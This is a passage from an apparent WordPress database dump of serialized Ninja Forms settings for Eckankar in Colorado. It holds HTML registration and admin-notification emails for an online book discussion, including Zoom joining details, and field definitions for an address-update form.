event\";s:3:\"tag\";s:0:\"\";s:13:\"payment_total\";s:1:\"0\";s:5:\"order\";s:1:\"2\";s:16:\"payment_gateways\";s:0:\"\";s:7:\"message\";s:18:\"{all_fields_table}\";s:8:\"reply_to\";s:0:\"\";s:12:\"email_format\";s:4:\"html\";s:7:\"subject\";s:22:\"Ninja Forms Submission\";s:2:\"to\";s:13:\"{field:email}\";s:9:\"from_name\";s:0:\"\";s:12:\"from_address\";s:20:\"{system:admin_email}\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:19:\"email_message_plain\";s:0:\"\";s:14:\"drawerDisabled\";b:0;s:13:\"email_message\";s:5309:\"<div class=\"boldgrid-section\"><div class=\"container\"><div class=\"row\"><div class=\"col-md-12 col-xs-12 col-sm-12\"><p><!-- [if mso]>  </p><style>    table {border-collapse:collapse;border-spacing:0;border:none;margin:0;}    div, td {padding:0;}    div {margin:0 !important;}	</style><p>  <noscript>                  96            </noscript>  <![endif]--></p></div></div></div></div><div style=\"text-size-adjust: 100%; -webkit-text-size-adjust: 100%; -ms-text-size-adjust: 100%; background-color: #ffffff;\" lang=\"en\"><table style=\"width: 100%; border: solid 1px #cccccc; border-spacing: 0;\"><tbody><tr><td style=\"padding: 0;\" align=\"center\"><p><!-- [if mso]>          </p><table role=\"presentation\" align=\"center\" style=\"width:600px;\"><tr><td><p>          <![endif]--></p><table style=\"width: 94%; max-width: 600px; border: none; border-spacing: 0; text-align: left; font-family: Arial,sans-serif; font-size: 16px; line-height: 22px; color: #363636;\"><tbody><tr><td style=\"padding: 0;\" align=\"center\"><p><!-- [if mso]>          </p><table role=\"presentation\" align=\"center\" style=\"width:600px;\"><tr><td><p>          <![endif]--></p><table style=\"width: 94%; max-width: 600px; border: none; border-spacing: 0; text-align: left; font-family: Arial,sans-serif; font-size: 16px; line-height: 22px; color: #363636;\"><tbody><tr><td style=\"padding: 40px 30px 30px 30px; text-align: center; font-size: 40px; font-weight: bold; color: #23507d; font-family: Georgia, serif; background-color: #c0dbf6;\">Eckankar In Colorado<br><br><span style=\"padding: 0px 0px 0px 0px; text-align: center; font-size: 22px; font-weight: bold; color: #333333; font-family: Arial, sans-serif; line-height: 25px;\">Book Discussion Registration</span><br><span style=\"padding: 0px 0px 0px 0px; text-align: center; font-size: 25px; font-weight: bold; color: #333333; font-family: Arial, sans-serif; line-height: 25px;\">&nbsp;</span> <span style=\"padding: 0px 0px 0px 0px; text-align: center; font-size: 25px; font-weight: bold; color: #23507d; font-family: Arial, sans-serif; line-height: 25px;\">\"Autobiography of a Modern Prophet\"</span></td></tr><tr><td style=\"padding: 30px; padding-top: 10px; background-color: #ffffff;\"><p style=\"font-size: 16px;\"><span style=\"color: #333333; font-size: 20px;\">Hello {field:firstname},<br></span></p><p style=\"font-size: 16px;\"><span style=\"color: #333333; font-size: 20px;\">Thank You For Registering! <br></span></p><p style=\"font-size: 18px;\"><strong>You Are Signed Up For The Following Loveland Book Discussion:<br>&nbsp;<span style=\"color: #23507d; font-size: 19px;\">\"Autobiography of a Modern Prophet\" -Online<br></span><br></strong><span style=\"color: #333333; font-size: 19px;\">This class started on <strong>August 22, 2021</strong> and will occur</span><span style=\"color: #333333; font-size: 19px; font-weight: bold;\">&nbsp;every 4th Sunday (12 occurrences) -- </span><span style=\"color: #333333; font-size: 19px; font-weight: bold;\">10:30 a.m. - 11:30 a.m.</span></p><p style=\"font-size: 22px; color: #f28a27;\"><strong>Zoom Login Information:</strong></p><p><strong>Meeting ID:</strong> 851 6644 0213 <br><strong>Passcode:&nbsp;</strong>675002<br><br>https://us02web.zoom.us/j/85166440213?pwd=QzRPejg4VkV2aWFONUZ0cTBBeFhoZz09<br><br>After you click the link, you will be prompted to either download the app to enter the meeting or enter through your browser. Please note that Zoom works best if you download the app. It is more stable and has more functions. Select use computer audio for sound.</p><p><strong>Dial-in number for those who need to join by phone:<br></strong>Find your local number: https://us02web.zoom.us/u/kwguM8maE<br><br>Please join the meeting 5 - 10 minutes ahead of time to help us start on time. We look forward to seeing you at this online event.<br><br>See you there!</p></td></tr><tr><td style=\"padding: 30px; background-color: #efefef; font-family: Arial, Helvetica, sans-serif; font-size: 15px; text-align: center;\"><p style=\"margin: 0;\">You are receiving this email because you have submitted a request through the <a href=\"https://eckankar-colorado.org/\">Eckankar in Colorado website.</a></p><p style=\"text-align: center; font-family: Arial, Helvetica, sans-serif; font-size: 15px;\">If you have any questions regarding the origin of this email, please feel free to get in touch, we\'re always happy to help out.</p></td></tr><tr><td style=\"padding: 30px; text-align: center; font-size: 12px; background-color: #747474; color: #cccccc;\"><p style=\"margin: 0 0 8px 0;\"><a style=\"text-decoration: none;\" href=\"https://www.facebook.com/Eckankar-in-Colorado-104663979586166/\"><img class=\"fr-fic fr-dii\" style=\"color: #cccccc;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2021/05/fb-icon-email.png\" alt=\"f\" width=\"40\" height=\"40\"></a>&nbsp;</p><p style=\"margin: 0; font-size: 14px; line-height: 20px;\">© Eckankar In Colorado -2021<br><a class=\"unsub\" style=\"color: #cccccc; text-decoration: underline;\" href=\"mailto:webmaster@eckankar-colorado.org\">Contact Us</a></p></td></tr></tbody></table><p><!-- [if mso]>          </td></tr></table><p>          <![endif]--></p></td></tr></tbody></table></td></tr></tbody></table></div><div class=\"boldgrid-section\"><div class=\"container\"><div class=\"row\"><div class=\"col-md-12 col-xs-12 col-sm-12\"></div></div></div></div>\";}s:2:\"id\";i:203;}i:2;a:2:{s:8:\"settings\";a:26:{s:10:\"objectType\";s:6:\"Action\";s:12:\"objectDomain\";s:7:\"actions\";s:10:\"editActive\";b:1;s:5:\"title\";s:0:\"\";s:3:\"key\";s:0:\"\";s:4:\"type\";s:5:\"email\";s:6:\"active\";s:1:\"1\";s:10:\"created_at\";s:19:\"2021-08-29 12:58:19\";s:5:\"label\";s:24:\"Admin Email Notification\";s:14:\"drawerDisabled\";b:0;s:2:\"to\";s:31:\"webmaster@eckankar-colorado.org\";s:7:\"subject\";s:22:\"Ninja Forms Submission\";s:7:\"message\";s:18:\"{all_fields_table}\";s:5:\"order\";s:1:\"2\";s:16:\"payment_gateways\";s:0:\"\";s:13:\"payment_total\";s:1:\"0\";s:3:\"tag\";s:0:\"\";s:13:\"email_subject\";s:72:\"New Book Discussion Registration from {field:firstname} {field:lastname}\";s:13:\"email_message\";s:5554:\"<meta http-equiv=\"content-type\" content=\"text/html; charset=windows-1252\">        <div role=\"article\" aria-roledescription=\"email\" style=\"text-size-adjust:100%;-webkit-text-size-adjust:100%;-ms-text-size-adjust:100%;background-color:#ffffff;\" lang=\"en\">      <table role=\"presentation\" style=\"width:100%;border:none;border-spacing:0;\">        <tbody>          <tr>            <td style=\"padding:0;\" align=\"center\">              <!--[if mso]>          <table role=\"presentation\" align=\"center\" style=\"width:600px;\">          <tr>          <td>          <![endif]-->              <table role=\"presentation\" style=\"width:94%;max-width:600px;border:none;border-spacing:0;text-align:left;font-family:Arial,sans-serif;font-size:16px;line-height:22px;color:#363636;\">                <tbody>                  <tr>                    <td style=\"padding: 0;\" align=\"center\"><!-- [if mso]>          <table role=\"presentation\" align=\"center\" style=\"width:600px;\">          <tr>          <td>          <![endif]-->                      <table style=\"width: 94%; max-width: 600px; border: none; border-spacing: 0; text-align: left; font-family: Arial,sans-serif; font-size: 16px; line-height: 22px; color: #363636;\" role=\"presentation\">                        <tbody>                          <tr>                            <td style=\"padding: 40px 30px 30px 30px; text-align: center; font-size: 30px; font-weight: bold; color: #ffffff; font-family: Georgia, serif; background-color:#1d5791;\">Eckankar In Colorado<br>                              <br><div align=\"center\"><div align=\"center\"><span style=\"padding:40px 30px 30px 30px; text-align: center; font-size: 28px; font-weight: bold; color: #f28a27; font-family: Arial, sans-serif; line-height: 25px;\">New Book Discussion</span></div><div align=\"center\"><span style=\"padding:40px 30px 30px 30px; text-align: center; font-size: 28px; font-weight: bold; color: #f28a27; font-family: Arial, sans-serif; line-height: 25px;\">Registration</span><br></div><span style=\"padding:40px 30px 30px 30px; text-align: center; font-size: 28px; font-weight: bold; color: #f28a27; font-family: Arial, sans-serif; line-height: 25px;\"></span></div></td>                          </tr>                          <tr>                            <td style=\"padding-left: 30px; padding-right 30px; background-color: #ffffff;\">                              <p class=\"\" style=\"font-size: 17px;\"><span style=\"color: #333333; font-size: 20px;\"><b><span id=\"nf-drawer-content\"><span class=\"nf-setting-groups\"><span class=\"nf-field-settings\">                                        </span></span></span></b></span></p>                              <p class=\"\" style=\"font-family: Open Sans; font-weight: 400; font-size: 20px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><b>Admin                                  Notification<br>                                </b></p>                              <b>                                <p class=\"\" style=\"font-family: Open Sans; font-weight: 400; font-size: 18px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">A                                  new Book Discussion registration                                  has been received for <br>\"<span style=\"font-size: 19px; line-height: 125%; color: #000000;\"><b><span style=\"font-size: 19px; line-height: 125%; color: #000000;\"><span style=\"color: #0963ba;\"><span style=\"color: #000000;\"><em>Autobiography of a Modern Prophet</em></span></span></span></b>\"</span>.&nbsp; </p><p style=\"line-height: 125%; margin-top: 0px; margin-bottom: 0px;\"><span style=\"color: #333333; font-size: 20px;\">Loveland Class information:<br></span><span style=\"font-size: 20px; line-height: 125%; color: #000000;\"><strong><span style=\"line-height: 125%; color: #000000;\">10:30 <span style=\"line-height: 125%; color: #000000;\"><strong><span style=\"line-height: 125%; color: #000000;\">am </span></strong></span>- 11:30 pm - (4th Sunday - 12 Occurrences)</span></strong></span></p></b><b>                              </b>                              <p></p>                            </td>                          </tr>                          <tr>                            <td style=\"padding: 30px; background-color: #efefef; font-family: Arial, Helvetica, sans-serif; font-size: 18px; text-align: left;\"><b>Registrant                                Information:</b><br>                              <br>                              <b>Name:</b>&nbsp; <span style=\"display: inline-block;\">{field:firstname}                                {field:lastname}<br>                              </span>                              <p style=\"font-family: Arial, Helvetica, sans-serif; font-size: 18px; text-align: left;\">                                <b>Email:</b>&nbsp;                                {field:email}</p>                            </td>                          </tr>                          <tr>                            <td style=\"padding: 30px; text-align: center; font-size: 16px; background-color: #747474; color: #cccccc;\">Regards,<br>                              Your ECK in Colorado                              Website</td>                          </tr>                        </tbody>                      </table>                      <!-- [if mso]>          </td>          </tr>          </table>          <![endif]-->                    </td>                  </tr>                </tbody>              </table>            </td>          </tr>        </tbody>      </table>    </div>\";s:9:\"from_name\";s:0:\"\";s:12:\"from_address\";s:0:\"\";s:8:\"reply_to\";s:13:\"{field:email}\";s:12:\"email_format\";s:4:\"html\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:19:\"email_message_plain\";s:0:\"\";}s:2:\"id\";i:204;}i:3;a:2:{s:8:\"settings\";a:32:{s:10:\"objectType\";s:6:\"Action\";s:12:\"objectDomain\";s:7:\"actions\";s:10:\"editActive\";b:0;s:5:\"title\";s:0:\"\";s:3:\"key\";s:0:\"\";s:4:\"type\";s:4:\"save\";s:6:\"active\";s:1:\"1\";s:10:\"created_at\";s:19:\"2021-08-29 12:58:19\";s:5:\"label\";s:16:\"Store Submission\";s:7:\"message\";s:160:\"This action adds users to WordPress\' personal data export tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.\";s:19:\"email_message_plain\";s:0:\"\";s:15:\"submitter_email\";s:0:\"\";s:18:\"fields-save-toggle\";s:8:\"save_all\";s:16:\"exception_fields\";a:0:{}s:18:\"set_subs_to_expire\";s:1:\"0\";s:16:\"subs_expire_time\";s:2:\"90\";s:11:\"success_msg\";s:42:\"Your form has been successfully submitted.\";s:14:\"drawerDisabled\";s:0:\"\";s:5:\"order\";s:1:\"3\";s:16:\"payment_gateways\";s:0:\"\";s:13:\"payment_total\";s:1:\"0\";s:3:\"tag\";s:0:\"\";s:2:\"to\";s:16:\"{wp:admin_email}\";s:13:\"email_subject\";s:22:\"Ninja Forms Submission\";s:13:\"email_message\";s:14:\"{fields_table}\";s:9:\"from_name\";s:0:\"\";s:12:\"from_address\";s:0:\"\";s:8:\"reply_to\";s:0:\"\";s:12:\"email_format\";s:4:\"html\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:12:\"redirect_url\";s:0:\"\";}s:2:\"id\";i:202;}}s:8:\"settings\";a:34:{s:10:\"objectType\";s:12:\"Form Setting\";s:10:\"editActive\";b:1;s:5:\"title\";s:74:\"Loveland - Book Discussion Registration: Autobiography of a Modern Prophet\";s:10:\"created_at\";s:19:\"2021-08-29 12:58:19\";s:17:\"default_label_pos\";s:5:\"above\";s:10:\"show_title\";s:1:\"0\";s:14:\"clear_complete\";s:1:\"1\";s:13:\"hide_complete\";s:1:\"1\";s:9:\"logged_in\";s:1:\"0\";s:3:\"key\";s:0:\"\";s:13:\"wrapper_class\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:10:\"add_submit\";s:1:\"0\";s:17:\"not_logged_in_msg\";s:0:\"\";s:16:\"sub_limit_number\";s:0:\"\";s:13:\"sub_limit_msg\";s:0:\"\";s:12:\"calculations\";a:0:{}s:15:\"formContentData\";a:7:{i:0;s:88:\"loveland_-_book_discussion_registration_-autobiography_of_a_modern_prophet_1630271086284\";i:1;s:2:\"hr\";i:2;s:9:\"firstname\";i:3;s:8:\"lastname\";i:4;s:5:\"email\";i:5;s:159:\"your_email_address_and_other_information_will_not_be_shared_with_any_third_parties_for_any_reason_it_will_only_be_used_to_respond_to_your_request_1617158441662\";i:6;s:20:\"submit_1618628929218\";}s:8:\"currency\";s:0:\"\";s:18:\"unique_field_error\";s:50:\"A form with this value has already been submitted.\";s:20:\"repeatable_fieldsets\";s:0:\"\";s:19:\"changeEmailErrorMsg\";s:0:\"\";s:18:\"changeDateErrorMsg\";s:0:\"\";s:20:\"confirmFieldErrorMsg\";s:0:\"\";s:22:\"fieldNumberNumMinError\";s:0:\"\";s:22:\"fieldNumberNumMaxError\";s:0:\"\";s:22:\"fieldNumberIncrementBy\";s:0:\"\";s:23:\"formErrorsCorrectErrors\";s:0:\"\";s:21:\"validateRequiredField\";s:0:\"\";s:21:\"honeypotHoneypotError\";s:0:\"\";s:20:\"fieldsMarkedRequired\";s:0:\"\";s:14:\"drawerDisabled\";b:0;s:17:\"allow_public_link\";i:0;s:10:\"embed_form\";s:0:\"\";}s:14:\"deleted_fields\";a:0:{}s:15:\"deleted_actions\";a:0:{}}',4,0x00),(53,'a:7:{s:2:\"id\";i:53;s:20:\"show_publish_options\";b:0;s:6:\"fields\";a:14:{i:0;a:2:{s:8:\"settings\";a:22:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:1;s:11:\"idAttribute\";s:2:\"id\";s:14:\"drawerDisabled\";b:0;s:15:\"container_class\";s:0:\"\";s:9:\"field_key\";s:8:\"html_201\";s:11:\"field_label\";s:4:\"Text\";s:4:\"type\";s:4:\"html\";s:6:\"fav_id\";s:0:\"\";s:6:\"def_id\";s:0:\"\";s:5:\"label\";s:4:\"Text\";s:15:\"input_limit_msg\";s:17:\"character(s) left\";s:13:\"default_value\";s:519:\"<h3><span style=\"color: #23507d;\"><strong><span class=\"bfLegend-l\"><span class=\"bfLegend-r\"><span class=\"bfLegend-m\">Add/Update Email or Address</span></span></span></strong></span></h3>\r\n<p style=\"padding-left: 30px;\"><strong><span style=\"color: #000000;\">Your Information Is Safe</span></strong>\r\nWe will never share your personal information with anyone. Your email address and any other information you give us will be held securely and only used to communicate regardingÂ Eckankar in Colorado events or news.</p>\";s:7:\"desc_el\";s:3:\"div\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:7:\"default\";s:521:\"<h3><span style=\"color: #23507d;font-size: 28px;text-transform: capitalize;\">Add/Update Email or Mailing Address</span></h3><p style=\"padding-left: 30px;\"><strong><span style=\"color: #000000;font-size: 22px;\"><br>Your Information Is Safe</span></strong></p><p style=\"padding-left: 30px; font-size:18px;\">We will never share your personal information with anyone. Your email address and any other information you give us will be held securely and only used to communicate regarding Eckankar in Colorado events or news.</p>\";s:3:\"key\";s:8:\"html_201\";}s:2:\"id\";i:495;}i:1;a:2:{s:8:\"settings\";a:53:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:2;s:11:\"idAttribute\";s:2:\"id\";s:5:\"value\";s:0:\"\";s:23:\"personally_identifiable\";s:0:\"\";s:21:\"custom_name_attribute\";s:0:\"\";s:11:\"custom_mask\";s:0:\"\";s:10:\"manual_key\";s:0:\"\";s:15:\"container_class\";s:15:\"one-half first \";s:7:\"default\";s:0:\"\";s:9:\"field_key\";s:11:\"textbox_202\";s:11:\"field_label\";s:10:\"First Name\";s:4:\"type\";s:7:\"textbox\";s:6:\"fav_id\";s:0:\"\";s:6:\"def_id\";s:1:\"6\";s:5:\"label\";s:10:\"First Name\";s:9:\"label_pos\";s:5:\"above\";s:4:\"mask\";s:0:\"\";s:10:\"datepicker\";s:1:\"0\";s:10:\"first_name\";s:1:\"1\";s:9:\"last_name\";s:1:\"0\";s:9:\"from_name\";s:1:\"0\";s:21:\"user_info_field_group\";s:1:\"1\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:17:\"calc_auto_include\";s:1:\"0\";s:11:\"calc_option\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";s:14:\"user_address_1\";s:0:\"\";s:14:\"user_address_2\";s:0:\"\";s:9:\"user_city\";s:0:\"\";s:8:\"user_zip\";s:0:\"\";s:10:\"user_phone\";s:0:\"\";s:10:\"user_email\";s:0:\"\";s:13:\"disable_input\";s:1:\"0\";s:11:\"input_limit\";s:0:\"\";s:16:\"input_limit_type\";s:4:\"char\";s:15:\"input_limit_msg\";s:0:\"\";s:10:\"user_state\";s:1:\"0\";s:16:\"autocomplete_off\";s:1:\"0\";s:8:\"num_sort\";s:1:\"0\";s:11:\"admin_label\";s:0:\"\";s:26:\"user_info_field_group_name\";s:0:\"\";s:28:\"user_info_field_group_custom\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:8:\"required\";s:1:\"1\";s:3:\"key\";s:11:\"textbox_202\";s:14:\"drawerDisabled\";s:0:\"\";}s:2:\"id\";i:496;}i:2;a:2:{s:8:\"settings\";a:50:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:3;s:11:\"idAttribute\";s:2:\"id\";s:5:\"value\";s:0:\"\";s:23:\"personally_identifiable\";s:1:\"1\";s:21:\"custom_name_attribute\";s:5:\"lname\";s:15:\"container_class\";s:8:\"one-half\";s:7:\"default\";s:0:\"\";s:9:\"field_key\";s:12:\"lastname_203\";s:11:\"field_label\";s:9:\"Last Name\";s:4:\"type\";s:8:\"lastname\";s:6:\"fav_id\";s:0:\"\";s:6:\"def_id\";s:1:\"7\";s:5:\"label\";s:9:\"Last Name\";s:9:\"label_pos\";s:5:\"above\";s:4:\"mask\";s:0:\"\";s:10:\"datepicker\";s:1:\"0\";s:10:\"first_name\";s:1:\"0\";s:9:\"from_name\";s:1:\"0\";s:21:\"user_info_field_group\";s:1:\"1\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:17:\"calc_auto_include\";s:1:\"0\";s:11:\"calc_option\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";s:14:\"user_address_1\";s:0:\"\";s:14:\"user_address_2\";s:0:\"\";s:9:\"user_city\";s:0:\"\";s:8:\"user_zip\";s:0:\"\";s:10:\"user_phone\";s:0:\"\";s:10:\"user_email\";s:0:\"\";s:13:\"disable_input\";s:1:\"0\";s:11:\"input_limit\";s:0:\"\";s:16:\"input_limit_type\";s:4:\"char\";s:15:\"input_limit_msg\";s:0:\"\";s:10:\"user_state\";s:1:\"0\";s:16:\"autocomplete_off\";s:1:\"0\";s:8:\"num_sort\";s:1:\"0\";s:11:\"admin_label\";s:0:\"\";s:26:\"user_info_field_group_name\";s:0:\"\";s:28:\"user_info_field_group_custom\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:8:\"required\";s:1:\"1\";s:3:\"key\";s:12:\"lastname_203\";s:14:\"drawerDisabled\";s:0:\"\";}s:2:\"id\";i:497;}i:3;a:2:{s:8:\"settings\";a:52:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:4;s:11:\"idAttribute\";s:2:\"id\";s:5:\"value\";s:0:\"\";s:23:\"personally_identifiable\";s:1:\"1\";s:21:\"custom_name_attribute\";s:5:\"phone\";s:11:\"custom_mask\";s:0:\"\";s:10:\"manual_key\";s:0:\"\";s:15:\"container_class\";s:14:\"one-half first\";s:7:\"default\";s:0:\"\";s:9:\"field_key\";s:9:\"phone_205\";s:11:\"field_label\";s:5:\"Phone\";s:4:\"type\";s:5:\"phone\";s:6:\"fav_id\";s:0:\"\";s:6:\"def_id\";s:2:\"15\";s:5:\"label\";s:5:\"Phone\";s:9:\"label_pos\";s:5:\"above\";s:4:\"mask\";s:14:\"(999) 999-9999\";s:10:\"datepicker\";s:1:\"0\";s:10:\"first_name\";s:1:\"0\";s:9:\"last_name\";s:1:\"0\";s:9:\"from_name\";s:1:\"0\";s:14:\"user_address_1\";s:1:\"0\";s:14:\"user_address_2\";s:1:\"0\";s:9:\"user_city\";s:1:\"0\";s:8:\"user_zip\";s:1:\"0\";s:10:\"user_email\";s:1:\"0\";s:21:\"user_info_field_group\";s:1:\"1\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:17:\"calc_auto_include\";s:1:\"0\";s:11:\"calc_option\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";s:13:\"disable_input\";s:1:\"0\";s:11:\"input_limit\";s:0:\"\";s:16:\"input_limit_type\";s:4:\"char\";s:15:\"input_limit_msg\";s:0:\"\";s:10:\"user_state\";s:1:\"0\";s:16:\"autocomplete_off\";s:1:\"0\";s:8:\"num_sort\";s:1:\"0\";s:11:\"admin_label\";s:0:\"\";s:26:\"user_info_field_group_name\";s:0:\"\";s:28:\"user_info_field_group_custom\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:8:\"required\";s:1:\"0\";s:3:\"key\";s:9:\"phone_205\";s:14:\"drawerDisabled\";s:0:\"\";}s:2:\"id\";i:498;}i:4;a:2:{s:8:\"settings\";a:50:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:5;s:11:\"idAttribute\";s:2:\"id\";s:5:\"value\";s:0:\"\";s:23:\"personally_identifiable\";s:1:\"1\";s:21:\"custom_name_attribute\";s:5:\"email\";s:15:\"container_class\";s:8:\"one-half\";s:7:\"default\";s:0:\"\";s:9:\"field_key\";s:9:\"email_204\";s:11:\"field_label\";s:55:\"Email    (please fill in if adding or updating email)\";s:4:\"type\";s:5:\"email\";s:6:\"fav_id\";s:0:\"\";s:6:\"def_id\";s:2:\"14\";s:5:\"label\";s:55:\"Email    (please fill in if adding or updating email)\";s:9:\"label_pos\";s:5:\"above\";s:4:\"mask\";s:0:\"\";s:10:\"datepicker\";s:1:\"0\";s:10:\"first_name\";s:1:\"0\";s:9:\"last_name\";s:1:\"0\";s:9:\"from_name\";s:1:\"0\";s:14:\"user_address_1\";s:1:\"0\";s:14:\"user_address_2\";s:1:\"0\";s:9:\"user_city\";s:1:\"0\";s:8:\"user_zip\";s:1:\"0\";s:10:\"user_phone\";s:1:\"0\";s:21:\"user_info_field_group\";s:1:\"1\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:17:\"calc_auto_include\";s:1:\"0\";s:11:\"calc_option\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";s:13:\"disable_input\";s:1:\"0\";s:11:\"input_limit\";s:0:\"\";s:16:\"input_limit_type\";s:4:\"char\";s:15:\"input_limit_msg\";s:0:\"\";s:10:\"user_state\";s:1:\"0\";s:16:\"autocomplete_off\";s:1:\"0\";s:8:\"num_sort\";s:1:\"0\";s:11:\"admin_label\";s:0:\"\";s:26:\"user_info_field_group_name\";s:0:\"\";s:28:\"user_info_field_group_custom\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:8:\"required\";s:1:\"0\";s:3:\"key\";s:9:\"email_204\";s:14:\"drawerDisabled\";s:0:\"\";}s:2:\"id\";i:499;}i:5;a:2:{s:8:\"settings\";a:54:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:6;s:11:\"idAttribute\";s:2:\"id\";s:21:\"custom_name_attribute\";s:7:\"address\";s:23:\"personally_identifiable\";s:1:\"1\";s:5:\"value\";s:0:\"\";s:11:\"custom_mask\";s:0:\"\";s:10:\"manual_key\";s:0:\"\";s:15:\"container_class\";s:14:\"one-half first\";s:7:\"default\";s:0:\"\";s:9:\"field_key\";s:58:\"street_address_add_or_update_mailing_address_1616603898544\";s:11:\"field_label\";s:46:\"Street Address (add or update mailing address)\";s:4:\"type\";s:7:\"address\";s:6:\"fav_id\";s:0:\"\";s:6:\"def_id\";s:1:\"8\";s:5:\"label\";s:46:\"Street Address (add or update mailing address)\";s:9:\"label_pos\";s:5:\"above\";s:4:\"mask\";s:0:\"\";s:10:\"datepicker\";s:1:\"0\";s:10:\"send_email\";s:1:\"0\";s:10:\"from_email\";s:1:\"0\";s:10:\"first_name\";s:1:\"0\";s:9:\"last_name\";s:1:\"0\";s:9:\"from_name\";s:1:\"0\";s:14:\"user_address_2\";s:1:\"0\";s:9:\"user_city\";s:1:\"0\";s:8:\"user_zip\";s:1:\"0\";s:21:\"user_info_field_group\";s:1:\"1\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:17:\"calc_auto_include\";s:1:\"0\";s:11:\"calc_option\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";s:10:\"user_phone\";s:0:\"\";s:10:\"user_email\";s:0:\"\";s:13:\"disable_input\";s:1:\"0\";s:11:\"input_limit\";s:0:\"\";s:16:\"input_limit_type\";s:4:\"char\";s:15:\"input_limit_msg\";s:0:\"\";s:10:\"user_state\";s:1:\"0\";s:16:\"autocomplete_off\";s:1:\"0\";s:8:\"num_sort\";s:1:\"0\";s:11:\"admin_label\";s:0:\"\";s:26:\"user_info_field_group_name\";s:0:\"\";s:28:\"user_info_field_group_custom\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:8:\"required\";s:1:\"0\";s:3:\"key\";s:58:\"street_address_add_or_update_mailing_address_1616603898544\";s:14:\"drawerDisabled\";s:0:\"\";}s:2:\"id\";i:500;}i:6;a:2:{s:8:\"settings\";a:54:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:7;s:11:\"idAttribute\";s:2:\"id\";s:11:\"field_label\";s:4:\"City\";s:9:\"field_key\";s:8:\"city_216\";s:7:\"default\";s:0:\"\";s:15:\"container_class\";s:8:\"one-half\";s:10:\"manual_key\";s:0:\"\";s:11:\"custom_mask\";s:0:\"\";s:21:\"custom_name_attribute\";s:4:\"city\";s:23:\"personally_identifiable\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:4:\"city\";s:6:\"fav_id\";s:0:\"\";s:6:\"def_id\";s:2:\"10\";s:5:\"label\";s:4:\"City\";s:9:\"label_pos\";s:5:\"above\";s:4:\"mask\";s:0:\"\";s:10:\"datepicker\";s:1:\"0\";s:10:\"send_email\";s:1:\"0\";s:10:\"from_email\";s:1:\"0\";s:10:\"first_name\";s:1:\"0\";s:9:\"last_name\";s:1:\"0\";s:9:\"from_name\";s:1:\"0\";s:14:\"user_address_1\";s:1:\"0\";s:14:\"user_address_2\";s:1:\"0\";s:8:\"user_zip\";s:1:\"0\";s:21:\"user_info_field_group\";s:1:\"1\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:17:\"calc_auto_include\";s:1:\"0\";s:11:\"calc_option\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";s:10:\"user_phone\";s:0:\"\";s:10:\"user_email\";s:0:\"\";s:13:\"disable_input\";s:1:\"0\";s:11:\"input_limit\";s:0:\"\";s:16:\"input_limit_type\";s:4:\"char\";s:15:\"input_limit_msg\";s:0:\"\";s:10:\"user_state\";s:1:\"0\";s:16:\"autocomplete_off\";s:1:\"0\";s:8:\"num_sort\";s:1:\"0\";s:11:\"admin_label\";s:0:\"\";s:26:\"user_info_field_group_name\";s:0:\"\";s:28:\"user_info_field_group_custom\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:8:\"required\";s:1:\"0\